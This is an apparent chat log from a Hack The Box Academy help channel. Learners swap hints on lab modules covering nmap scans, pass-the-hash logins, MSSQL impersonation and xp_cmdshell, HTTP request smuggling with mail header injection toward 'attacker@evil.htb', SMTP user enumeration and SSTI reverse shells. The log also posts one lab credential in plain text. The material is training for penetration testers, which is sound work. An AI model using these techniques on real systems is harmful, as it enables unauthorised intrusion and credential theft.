Thanks. I'll see to it later on. currently doing the hard one and in that i got the admin password. but it is saying its wrong. is that intentional?
i don't recall getting admin pw in common services - hard, just pure impersonation
i'll refer you back to the SQL section for advice on where and what to look for
it's grepping for the left angle bracket, then any number of characters, then right angle bracket
Try to think of various ways add_user or delete_user could be abused. You'll get it, don't overcomplicate it, and you only need one of those parameters for it.
and filtering lines that have those. out
so you're left with text that isn't in html formatting or code formatting
Aha! That makes sense now!
Thank you!
literally takes a few seconds of thinking
or at least doing the command without the grep
and with it to see the difference
¯\_(ツ)_/¯
Yeah, there was nothing in the grep man page though that showed the operators after -v just that it inverted
yes
what does inverted mean, and apply that to grep
if normal grep includes what you search for, inverted...
Which nmap scan is actually stealthier? -sS or -sT?
usually -sS because it doesn't complete the full connection
Is it a mistake in the Network Enumeration with Nmap module then? Cuz it says -sT is stealthier since it makes a full connection? I'm confused cuz I've read in some places that -sS is stealthier as well.
it goes SYN -> SYN-ACK -> RESP iirc (which cuts the handshake before it completes)
the other thing to consider is that it's kinda suspicious to not fully connect to a port
So it could really be either depending on the environment?
normal behavior would be connect to a port; then cutting the connection
yep
Is there a recommended one? Like one generally over the other when beginning to enumerate an environment?
Syn is slower by design
so if you find your scans taking forever, sT is the way to go
I was not able to connect with the mssql service. It gave "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified) (.Net SqlClient Data Provider)"
Wait, I thought -sT was slower since it makes a full connection and waits for a response before moving onto the next port?
i didn't have issues with sqlcmd from f* POV
it's because of how -sS works, it makes assumptions and sometimes queries a port a few times if it's unsure
So... -sT is faster and more reliable?
ye
I see. Thanks. I got one more question, the module also talks about tracing packets, and uses the following parameters when doing so: -Pn --disable-arp-ping -n. Is it safe to assume using these parameters when normally scanning helps with the speed without affecting the results?
-Pn disables ICMP ping; nmap normally sends an ICMP echo request to see if a host is up. Windows often has responding to ICMP echo disabled
--disable-arp-ping disables address-resolution-protocol ping
-n disables reverse dns lookup
basically tells nmap "this host is fine, trust me bro"
i believe the options are explained in the nmap module
They are.
I was just wondering if those options affect the speed of scans in any way.
I see. So it does affect slightly.
-sT scan is not faster. It makes a full TCP handshake while -sS doesn't, so it's much faster.
i've also had issues with -sS where an -sT scan makes it work
against the same target
¯\_(ツ)_/¯
i.e. Syn scan getting stuck at like 99%
where TCP works fine
Don't know about that with certain targets, but overall and technically it's just faster
Oh okay. Thanks for clarifying.
So -sS is generally the better go-to option?
just use what reliably works for you
Alrighty, thanks to the both of you.
i wouldn't say it's generally the better go-to. if you're performing a lot of half handshake requests sometimes a firewall may block you, so it may actually be better to do a slower full handshake scan
really depends on the target
Guys am doing Password Attacks - Medium lab:
I have got access to the machine using jason credentials but am stuck on obtaining the root flag.
Keep looking around, reading things is helpful- start there
The documentation that gives you j* also hints at something
Hi guys quick question
Anyone please respond
Tier 0 Fundamental General 6 hours
This module covers the fundamentals required to work comfortably with the Linux operating system and shell.
the 6 hours is the estimated time or expiry time
if i unlock the module will it expire in 6 hours?
it is the estimated time of completion
Oh okay Thanks!
hi everyone
I'm stuck at the (XSS ---> Session Hijacking) section. I tried every payload in the section but my php listener doesn't get anything
you can DM me
Am I the only one who is having trouble spawning machines in the module? I mean it just disconnects you after 2-3 mins
Are HTB laboratories doing poorly? I connect via xfreerdp and the screen stays black....
try pressing the space bar
it worked xd
ok
Hello everyone, I'm currently working on the Analyzing Evil With Sysmon & Event Logs module and struggling with accessing sysmon as said in the instructions - C/tools/sysmon.exe, it's just not opening (shutting down after a sec.). Does anyone have any suggestions?
@next bronze I did it! I got in with pth of the svc user! :D
Of AD Skill assessment 2.
good job
Right click and open as an Admin.
It's a command line interface app, not GUI. Try opening a command prompt and running it from there.
And get the .zip and do some bloodhound stuff
I tried to run a command in regular cmd (`C:\Tools\Sysmon> sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n`) but got an error.
I wonder, if ABXXX has rdp rights, can I rdp with his user, and pth mimikatz with the svc account hash so I get cmd from the svc who has admin rights?
Cuz rn I can't find rdp tool which uses pth.
i'd have to see the command, but i tried it on my pc and it worked fine. just open an elevated command prompt and run it out of the directory with .\sysmon.exe
xfreerdp can pth /pth:ntHash, psexec/netexec and a lot of other tools can also pth remotely, there's no need to use mimi for it
Kali Linux contains a large number of very useful tools that are beneficial to information security professionals. One set of such tools belongs to the Pass-the-Hash toolkit, which includes favorites such as pth-winexe among others, already packaged in Kali Linux. An example of easy command line access using pth-winexe is shown below.
why do you need to rdp tho? it's poopoo, just get a shell
It's cuz I can drag n drop
;-;
But I will do a shell either way, esketit
Yoo, I can transfer the tools with the ab account to the main C drive and shell with the svc and do shenanigans from there on
Can you provide more details? If I understood you correctly I have to open a regular cmd and paste the command there?
you have a space after the directory before the binary, you have a > at the end of the directory, so it's not going to work
c:\should\be\full\path\to\the.exe
Something wrong?
make sure the path is correct, check your command
sure, many ways to do it
Look at the very first part of your command. Your directory ends with ">". It should be "\". Directly after that, you shouldn't have a space before the "sysmon.exe" part. All the rest of the spaces are fine.
It helped, thanks a lot for your contribution. Why is it not correct in the instructions?
i don't have that module so i don't know what the instructions are, but my guess is they are simply in the directory already and aren't typing out the full path
oh yeah, that's what it is, i see it in your screenshot
Can somebody lend a hand with the HTTP Attacks skills assessment?
I'm having that same issue; the response of the smuggled call is nested in the first one. Any hints how you solved it?
"To utilize the updated Sysmon configuration, execute the following.
`C:\Tools\Sysmon> sysmon.exe -c sysmonconfig-export.xml`"
(from Analyzing Evil With Sysmon & Event Logs)
I've changed it to the correct form without spaces and now there is an error related to the non-existence of the file. Any thoughts?
help pls
nvm got it
I got it with that method, just ensure that your email client isn't pointing to the expired box. I got about 9 emails before I realised I was looking at an empty inbox from the last expired target.
thanks for the hint. Could I DM you?
The kali disconnects after like 2 mins, there is something wrong with the machine in this section
Switch vpns.
From eu academy to us for example.
Don't forget to download the new vpn files after you switch.
- give the machine some time to load, it could break pipes a lot.
its happening periodically
disconnects every 2 mins
btw im doing it with pwnbox and pwnbox connection is fine
this is just super annoying fix that kali
i ran this like a million times now
screw this rdp in rdp in rdp
first i need to rdp to kali then to the target using that bob:Slavi123
btw it works now after changing vpn server, ty
For whatever reason copy-paste isn't working with the TCP connection, so I need to type the flag lol
Yep, you'll get used to it. I was so tilted when doing this module last week
......
windows module machines are trash
I'd sooner finish an entire module than this one section, ahh
Windows machines on average take a little longer to spin up all the services.
im out fix the damn machines pls
sorry for my mental breakdown in chat yesterday i was having a bit of a rough day
@next bronze sorry i snapped at you
hello guys,
What is the membercount: of the "Interns" group?
I couldn't execute this query with bloodhound, I don't know exactly how to do it.
all good
I mean just google how to get a domain group's member count, it doesn't have to be BH
I believe the module and sections gives you a command
Bloodhound is very much a crutch that people rely way too heavily on
It's a useful tool, sure, but it isn't a one and done tool
okey thx
Hey quick question, I'm reading about GPOs order of precedence and this paragraph confused me a bit.
if Disallow LM Hash has precedence over Block Removeable Media and Disable Guest Account, wouldn't that mean it is processed last?
And another question, in this example, if I set 2 GPOs to Enforced, one in the domain level and one in the OU, will the OU enforced one overwrite the domain level enforced one?
precedence means it has priority
think golf, lower number better
Exactly, if it has priority wouldn't that mean it's processed last?
But this is written earlier in the section
```
a GPO attached to a specific OU would have precedence over a GPO attached at the domain level because it will be processed last and could run the risk of overriding settings in a GPO higher up in the domain hierarchy.
```
That's why I'm confused
There exists a need to properly read, deploy, and examine the results of Group Policy. By its architecture, Group Policy Deployment to the Clients or Servers can be erratic and latent, or even non-existent throughout your Enterprise Organization, frustrating Administrators who are rolling out the Group Policy to Client or Server computers. To he...
it is written here that GPOs that Windows processes last have the highest precedence.
it just depends; in a domain environment - Windows (Local) is almost never used
small number = processed last
sorry i misspoke
but precedence order = reverse application order
Understandable, anyways thanks for the resources I'll read those
So was it a mistake from the academy?
nope
in the case with (enforced) they are enforced last, thus take precedence
think of it this way it's a FILO stack
the stack is in an order, but only the last is taken until it's iterated through
If small number = processed last and Disallow LM Hash is the smallest number, it should be processed last shouldn't it?
it's processed after Disable Guest Account and Block Removable Media
in this scenario it's 6 -> 5 -> 4 -> 3 -> 2 -> 1
Yeah, and it says in the paragraph there that its processed first
read like the last 2 sentences here
hey is THM's jr pentester path worth my time if i'm planning on doing CPTS afterwards
someone recommended i do the jr pentester path before CPTS
you can suggest a change to wording in #1234357888114364508 under the category "typo"
sure, if you need more confidence to tackle the CPTS path there's nothing wrong with it
the quality will be vastly different
but as long as you're learning something along the way ¯\_(ツ)_/¯
I will, thanks for the help
CPTS and its related Information Security Foundations path prepare you well enough for the exam
but nothing wrong with sourcing your information from multiple places
¯\_(ツ)_/¯
yeah i'm currently on infosec foundations and once i finish that i'm going to finish cisco's intro to networking course
because it's free and it's cisco and if there's any resource in the world i would trust to teach me networking it would be cisco
Networking is rough to start with, then once you understand the logic it's super easy
so i've heard
some of it made sense really easily and some of it is still really confusing
yeah you can find lots of networking documentation for free that are CCNA and Cisco pdfs
the cisco networking course goes into much more detail and material than the HTB intro to networking module
subnet masks are nearly the most confusing
agreed
just remember you fill bits left to right
i'm hoping cisco explains subnetting better than HTB
tbf subnetting isn't a huge part of hacking, understanding the different subnets sure
but actually setting a subnet, not really
not discounting that it's not useful to learn
it definitely helps you, at a glance, determine if 2 ips are in the same subnet or not
i.e. 172.16.5.x vs 172.16.6.x
that's slightly reassuring
the only thing you might need to know subnetting/routing for is if you use a tool like ligolo where you have to set the interface up
but it's not really that hard, and plenty of guides out there for it :)
yeah i just found a subnetting calculator and i doubt i'll ever need to do any mental subnetting except maybe for an exam
yeah unless you're doing a CompTIA exam, you don't really need to manually do it
also writing it down can help
idk if i shared the link in here but i'll see if I can refind it, but it's a CCNA learning section about subnetting that's actually really well diagramed - you'll probably run across it
eh not what i was looking for but while it doesn't explain it, it does do the math a bit http://www4.northampton.edu/kmanna/Cisco_Student_Web/SG/How-to-Subnet 10.pdf
https://www.youtube.com/watch?v=4kMGs9-HDEk&ab_channel=ProfessorMesser and ofc professor messer
Network+ Training Course Index: https://professormesser.link/n10008
Professor Messer’s Course Notes: https://professormesser.link/008cn
Discount exam vouchers: https://professormesser.com/vouchers/
Before you can use a shortcut to calculate subnet values, it’s useful to understand the binary math. In this video, you’ll learn how to ca...
didn't know CPTS covers more than 50% of CBBH
it's mostly the web related stuff that overlaps
that's about it; cpts scratches the surface of web, cbbh digs into it more
most people would actually say the opposite
as techniques in cbbh can make some web portions of the cpts path trivial
but that's neither here nor there
which path you doing now a days
as long as it works for you
still on CPTS; need to prioritize school first before diving back into the path
uni
for reference highschool for me was at least a decade ago ;w;
I'm having a 10y anniversary from my elementary this year
just a baby

Knowing that there are people here from the time when dinosaurs roamed the earth makes me feel a little better about myself
the oldest people in here are floating around like their 50s
@sour sigil this guy is in his 50s
oof if that's his profile
I am on Server Side attacks module on the SSTI example 3. Can't seem to get the reverse shell to work, gives me an error everytime
genuinely on a public IP you're not gonna get a reverse shell
you're gonna have to do other things
as a general rule of thumb: Public IP = Shell not intended
ok so I just got sent into a rabbit hole by them giving a reverse shell payload.
so I just use tplmap?
I solved it
Hi, did you figure out why you got the answer? Can you DM me when you are free?
the reverse shell works if it's a private domain that shares an interface
or you have a remote C2 you're operating
Hello guys I am new here I just want to learn if you can help me I really appreciate it
if you have a problem with an academy module you can pose the question here with:
- the module name (and link)
- the section name
- what you're having trouble with (don't just repeat the question in the section)
- what you've tried
bear in mind: avoid spoilers where possible; omit usernames and passwords
wrap command bits in backticks "`" (note for large blocks of code, the automod might detect it as "spam" and delete it, you'll need to link your HTB Labs account following #welcome to be able to avoid that)
e.g. `nmap -p- IP`
if you don't use backticks something like *l blahblahblah* will get formatted as l blahblahblah
large code blocks can be formatted with
```[code language (optional)]
code
```
(on mobile the code language syntax highlighting isn't shown)
```python
import library
print("thing")
```
What exactly don't you understand? What do you need help with?
sub.domain.tld. though usually you can take out the trailing .
Think how you visit the base page of a website
so sub.name.tld?
Ye
alright, linux fundamentals done
what should i go for next? anything i would like?
Do the information Security Foundations path
alright great
After that it's really just whatever interests you
thanks alot
We don't know what your interests are so we can't say what would interest you lmao
yeah ofc
oh shit I just realised linux fundamentals was just a part of it (security foundations) LMAOO
loll
im like tf is happening
Hey, I'm having a hard time understanding mssql hash stealing and impersonation. Any sources you recommend? I tried some blogs and still am not able to understand the dynamics of it. Any beginner-friendly sources?
which module are you doing?
cause i dont remember any attack of mssql hash stealing
attacking common services
Thanks for the guidelines. What would be considered a spoiler? I'm having trouble drawing the line between explaining what I've done and keeping it totally spoiler-free
Usernames, passwords, direct file locations
the topic is still there in academy module. so i wanted to understand it too.
I.e. I used the password I found for j* to get the file
is it the sql attack section?
Hash stealing is just literally stealing the authentication hash, Microsoft uses NTLM authentication so when it connects to another share it also sends that NTLM hash
Impersonation is just I can perform queries as this other user
If that other user also happens to be an admin/database admin then by proxy you are able to do administrative tasks
Such as change configurations in the database, like enabling xp_cmdshell
Hi community. Seeking some help here with a module I'm very stuck with:
- the module name and section: HTTP Attacks - Skills Assessment https://academy.hackthebox.com/module/191/section/2069
- what I am having trouble with and what I have done: I'm not sure what to do really. I figured I need to hack the mail form into cc'ing my mail (attacker@evil.htb) and bypass the WAF. So I crafted a malicious email with header injection and I URL-encoded it. The POST request went through and I got my 200 OK. But checking the /mail endpoint returns nothing.
I noticed the mailhub web interface says I'm disconnected, so I guess websockets are not going through. I tried checking my inbox using mailhub's API with the endpoint /api/v2/messages?limit=50, but also like that my mailbox looks empty, i.e. I got a response from the API but stating I have 0 messages. I have not spotted any need for smuggling any call, so I'm sure I'm missing something. Any hints are very welcome. I have also searched in the forums, googled it, and nada. Please help a desperate soul here
Try to smuggle your request past the WAF
you mean the request with the mail form, without encoding it?
I tried that.. but I figured (or so I thought) the only way to get past the WAF is encoding the CTRL character, as the WAF scans the body of every call... After encoding it there didn't seem to be a need for smuggling
First try to identify how the lab is vulnerable to request smuggling and then craft a payload
Line breaks in your POST data have to be URL-encoded as shown in the examples
So encoding + smuggling you mean?.. Hope you don't mind me asking.. but if encoding was enough to get my call answered with a 200, wouldn't that indicate there is no need for smuggling?
200 doesn't mean it will get through the WAF
oooh ok, gotcha
anybody doing this? Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I got a bunch of names, none are the answer however
however**
using the right method will give you the right answer
VRFY is more reliable than RCPT
AD enumeration / Credential Enumeration - from Windows
from xfreerdp just getting black window, machines were restarted few times
care to provide some more detail?
press enter
nope
then why even answer to begin with?
i gave you enough info to get the answer
¯\_(ツ)_/¯
thanks mate
stupid af, was struggling for few minutes with that
there's a tool called smtp-user-enum
just to show you that it does, in-fact, work
Sorry to insist on this one. But how does a 200 not mean I got past the WAF? If the WAF rejects I would get a 401. Nevertheless I tried now encoding + smuggling.. I can see both calls got 200 and a syntax error at the bottom (expected because of the last chunk being 0 length long).. but still no mail 😩. Am I missing something else I need to do or should I just focus on trying to smuggle the call in some different way?
There is probably something wrong with your payload. Check that you have all required headers. You can send it to me as dm if you want so I can check it.
Dang dude, I can't get it to work through linux, it fails and asks if I trust the given certificate or something
that's not a failure
that's just a certificate thing, which will always happen
i believe if you add like /cert:ignore or /cert-ignore it'll skip that prompt (assumes Yes)
if it's a username/pw error: you'll get ERRCONNECT_NTSTATUS_LOGON_FAILURE or something like that
Doing attacking common services hard assignment.
So I was able to access rdp and then able to find out the sysadmin user, but unable to impersonate it. The 'testadmin' user is of WINSRV02\SQLEXPRESS share. If I try to login with testadmin it says "server was not found or not accessible". Please nudge me in the right direction
you don't need to specify the server to connect to it
you can impersonate a user with f* I suggest doing all enumeration techniques from the SQL section relating to MSSQL
yes i did impersonate with F* to J*. But J does not have sysadmin rights. So I am not able to enumerate more. any command i execute gives an error
you can definitely enumerate more; read all of the SQL section, hint: you're not gonna find the answer on the DB server you start with
how to connect to the other server (WINSRV02\SQLEXPRESS). i did go through the sections.
WINSRV02 isn't the other server
ohhhh
that's the server you're on
okey
Marice, quick question how long have you been uhh studying(?)
you know everything dude im actually kinda jealous lol
i just answer the same questions a lot and have notes of most of the skill labs
shit i shouldve taken notes as well
i mean the cert exams are open-note exams so...
and no one is expected to memorize everything
no way
thats good
with my case, repetition breeds familiarity
the only thing you can't do on the exams is ask another human for help
imma have to go through the whole path again and note shit down
but any tools you prefer to use rather than what's shown in the course is ok to use
oh nice
even chatGPT
damn
¯\_(ツ)_/¯
if you ask another human however, then that's where you get in trouble and risk your cert and exam attempt getting revoked
makes sense
chat gpt is allowed?
ChatGPT pretend you are a human.
For File Upload Attacks Skills Assessment. I'm trying to get the POST request in Burp when I upload a file and I'm only getting GET requests. I've tried both the Green button and Submit button. Is there a particular way to get the POST request once you submit an image?
a small question. is the way in the academy section or i have to google my way out
everything you need to know to move forward is in the SQL section, you just need to modify it to your situation
hello everyone, I have a problem with metasploit, I am new to pentesting and I ask for your understanding, I have a problem with arp spoofing
hello everyone, I have a problem with metasploit, I am new to pentesting and I ask for your understanding, I have a problem with arp spoofing
I've been scanning local networks for half an hour and can't find anything, although metasploit is connected over the local network
it has been scanning local networks for half an hour already and can't find anything, although metasploit is connected over the local network
no wait. i was on Win-Hard. WinSRV02 is other one
test
logged in using F in Winhard
what academy module does this have to do with?
I'm in the wrong channel, sorry
I'm in the wrong channel, sorry
I take it you're using some sort of translator
read and follow #welcome to access more of the server
yes on better discord
yes in BetterDiscord
you don't have to reply every time
i also need help lol
Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)
and i assume i have to use Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber
again
but change something in -Class?
or am i completely off to what i gotta do
tf thats confusing
OH, got it nvm
hi I need help with vhosts section of information gathering - web edition section. I'm on question 2 and here's my command I'm typing in and it just gives me a help page:
┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w ./vhosts -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 612
can someone help me with this?
i don't think your fs is correct
you want to filter out the most common file size
as that's gonna be the stuff without data on it
also the basic vhosts list they have you craft doesn't get everything
this is from the module Finding Evil with Windows Logs. I opened Event Viewer and don't see any executable in the format specified and for that date anywhere
i suggest using a subdomain discovery list
well i think it's asking to basically follow the section to analyze further information related to that event
the 4624 is a successful logon; meaning you get a username/account name to go off of
yeah looking at it, it kinda walks you through the mindset of how to get it
Did you add the IP to your hosts file? try that and use www.inlanefreight.htb instead of the ip
you're probably missing something in your command if it's showing the help menu. if your command is correct it should run the binary, your command in here looks right
ok I did that already and now it's showing better results. we'll see if what I'm doing now gets better results in terms of getting the flag
then I'll come back and ask again if I need more help
examine the 4624 -> get the SubjectLogonID -> use a custom xml query that uses the SubjectLogonID and dive further
i'd recommend looking at the positive results to be sure that you aren't doing it incorrectly
Thanks @fathom pendant . Man i was so close. impersonated and accessed the right server multiple times. Didn't enable xp_cmdshell. lol
"what do you mean it's not right"
I'm actually getting an alphabetical list of every vhost is what it looks like it's doing and there's a hidden page so I want to see if this works better
waiting for output to complete
the answers in this section are like <h1> Flag [N] </h1>
<p> HTB{..} </p> iirc
don't forget to filter by size
i think his filter size is wrong
He is using the filter size i used, but he mentioned the help menu came up which means he missed some syntax initially
is it the right one? i must have forgor then
to summarise the mssql: to get access to the linked server, we need some user with sysadmin rights, and for executing commands we need xp_cmdshell.
no
to access the linked server you just need someone with access to the linked server
they don't necessarily need to be sa for it
and yeah generally for executing system commands you need xp_cmdshell
yeah. you are right.
Nah you're right. In my notes i had the command example they gave, but in my screen shot i did have to change the size
it's not that bad
MySQL is much better.